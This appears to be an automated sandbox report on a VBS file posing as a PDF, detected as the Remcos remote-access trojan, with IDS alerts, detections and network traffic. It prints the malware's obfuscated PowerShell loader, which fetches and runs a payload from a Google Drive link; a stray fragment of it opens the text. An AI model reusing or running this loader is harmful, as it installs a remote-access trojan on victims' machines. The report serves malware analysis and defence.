CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill H

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:37:50.473361+010028033053Unknown Traffic192.168.2.549708142.250.181.238443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:38:58.946806+010028032702Potentially Bad Traffic192.168.2.549716142.250.181.238443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: Document BT24#U00b7pdf.vbsVirustotal: Detection: 14%Perma Link
              Source: Document BT24#U00b7pdf.vbsReversingLabs: Detection: 18%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbG source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdbh source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdbq source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 142.250.181.238:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49716 -> 142.250.181.238:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1590762513.0000026D74440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: wscript.exe, 00000000.00000003.1303484751.00000293D891F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1304924538.00000293D892A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.1303484751.00000293D891F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1304924538.00000293D892A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0057B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsmP
              Source: powershell.exe, 00000008.00000002.1952137250.0000000004B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsmXRMl
              Source: msiexec.exe, 0000000C.00000002.2237358289.0000000022770000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b3
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4bR
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4bz
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
              Source: msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/%
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0059E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
              Source: msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download
              Source: msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/z
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1590762513.0000026D744A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49717 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7624.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2112.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Sample has a suspicious name (potential lure to open the executable)
              Source: Document BT24#U00b7pdf.vbsStatic file information: Suspicious name
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv 